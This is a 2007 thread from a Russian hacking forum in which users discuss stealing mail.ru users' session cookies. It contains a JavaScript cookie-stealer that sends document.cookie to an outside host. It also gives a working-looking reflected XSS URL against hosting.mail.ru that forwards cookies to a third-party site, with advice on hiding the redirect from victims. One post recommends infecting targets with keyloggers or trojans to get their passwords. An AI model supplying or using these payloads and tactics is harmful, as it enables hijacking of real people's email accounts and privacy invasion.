ANTICHAT Forum
HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
НОВЫЕ ТОРГОВАЯ НОВОСТИ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости > Уязвимости Mail-сервис
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 21.05.2007, 23:16
DimOnOID
Постоянный
Регистрация: 05.12.2006
Сообщений: 477
С нами: 10226672

Репутация: 441
По умолчанию

Цитата:
Сообщение от cigaretteburn  
Всем привет. У меня такой вопрос: как с помощью снифера на античате, (http://antichat.ru/cgi-bin/s.jpg) узнать куки на mail.ru ??
снач можешь прочитать вот тут потом можешь посмареть тут а уже потом ...или найти самому активную или пасссиввную...или зайти сюда или сюда и поискать пост с XSS на mail.ru
 
Ответить с цитированием

  #2  
Старый 22.05.2007, 01:24
ultimatum
Участник форума
Регистрация: 28.04.2007
Сообщений: 239
С нами: 10019906

Репутация: 161
По умолчанию

Цитата:
естественно на mail.ru такой вариант не прокатит, т.к служба безопасности почты понимает всю опасность и фильрует подобные весчи!
ну по ссылке то всё ровно можно заманить человека, где соответственно будет рабочий, подделанный xss ,
 
Ответить с цитированием

  #3  
Старый 22.05.2007, 01:55
Algol
Регистрация: 29.05.2002
Сообщений: 1,799
С нами: 12604706

Репутация: 0


По умолчанию

Цитата:
Сообщение от ultimatum  
ну по ссылке то всё ровно можно заманить человека, где соответственно будет рабочий, подделанный xss ,
Куда бы ты не заманивал пользователя, все равно должен быть xss на целевом сайте (в данном случае mail.ru)
 
Ответить с цитированием

  #4  
Старый 22.05.2007, 02:34
cigaretteburn
Новичок
Регистрация: 21.05.2007
Сообщений: 10
С нами: 9986201

Репутация: 3
По умолчанию

Цитата:
Сообщение от ultimatum  
ну по ссылке то всё ровно можно заманить человека, где соответственно будет рабочий, подделанный xss ,
Ага, ссылка на сни должна быть на mail.ru, например в письме, но почта фильтрует подобные ссылки.. я слышал можно закодировать ссылка со криптом както... это так? кто знает?
 
Ответить с цитированием

  #5  
Старый 22.05.2007, 02:42
cigaretteburn
Новичок
Регистрация: 21.05.2007
Сообщений: 10
С нами: 9986201

Репутация: 3
По умолчанию

А можно обычный код
Код:
<script>img = new Image(); img.src = "http://host.ru/s/s.gif?"+document.cookie;</script>
встроить в gif или jpeg ведь на mail.ru можно к своему аккаунту прикреплять фоты, можно как нить в фотку встроить этот код? а потом написать письмо жертве на ссылку этой картинки, или саму картинку, тогда код будет на целевой системе и всё будет гууд) Вот только можно так сделать??????
 
Ответить с цитированием

  #6  
Старый 22.05.2007, 02:53
cigaretteburn
Новичок
Регистрация: 21.05.2007
Сообщений: 10
С нами: 9986201

Репутация: 3
По умолчанию

нда... весь прикол в том что выложенные Xss почти все уже не работают..(((
 
Ответить с цитированием

  #7  
Старый 22.05.2007, 08:22
XHTTP
Постоянный
Регистрация: 24.02.2007
Сообщений: 446
С нами: 10110819

Репутация: 316
Angry

Цитата:
Сообщение от cigaretteburn  
нда... весь прикол в том что выложенные Xss почти все уже не работают..(((
Неработает одно, работает другое... Нужно мыло Чела? пихни ему кейлогер, узнаешь не только пасс от его мыла...
Да знаю - легко сказать. И тем немение троян работает!
Ещё много дебилов, чьи антивиры пропускают старые трояны, вирусы, кейлогеры... В пример могу взять свой университет - стадо тупых носорогов сидящих за компами...
 
Ответить с цитированием

  #8  
Старый 22.05.2007, 11:51
cigaretteburn
Новичок
Регистрация: 21.05.2007
Сообщений: 10
С нами: 9986201

Репутация: 3
По умолчанию

Цитата:
Сообщение от xhttp  
Неработает одно, работает другое... Нужно мыло Чела? пихни ему кейлогер, узнаешь не только пасс от его мыла...
Да знаю - легко сказать. И тем немение троян работает!
Ещё много дебилов, чьи антивиры пропускают старые трояны, вирусы, кейлогеры... В пример могу взять свой университет - стадо тупых носорогов сидящих за компами...
Хм.. хорошая идея но всё же если кто что может сказать полезного насчёт снифа - пишите. А насчёт кейлогера - дайте ссылку на хороший без лагов, а то их тоже не мало в сети.. А насчёт универа - у меня также вгруппе стадо придурков)
 
Ответить с цитированием

  #9  
Старый 22.05.2007, 11:56
DimOnOID
Постоянный
Регистрация: 05.12.2006
Сообщений: 477
С нами: 10226672

Репутация: 441
По умолчанию

Цитата:
Сообщение от cigaretteburn  
нда... весь прикол в том что выложенные Xss почти все уже не работают..(((
как не работают??? вот тебе пример...

Код:
http://hosting.mail.ru/selectLoginForConstructor.jsp?constructor="><script>navigate('http://site.ru/s.gif?'.concat(document.cookie))</script>
///при этом можно открыть гифку ..и вписать туда переадресацию.....чтобы палевно не было...

Цитата:
Сообщение от cigaretteburn  
встроить в gif или jpeg ведь на mail.ru можно к своему аккаунту прикреплять фоты, можно как нить в фотку встроить этот код? а потом написать письмо жертве на ссылку этой картинки, или саму картинку, тогда код будет на целевой системе и всё будет гууд) Вот только можно так сделать??????
Можно встроить в png .... в конец записать ...и в фоту на маил ру ..и то будет работать только в IE ...вот тут почитай
 
Ответить с цитированием
Ответ



Предыдущая тема Следующая тема
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
сниффер АНТИЧАТА Black_Death Болталка 2 17.05.2007 19:16



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.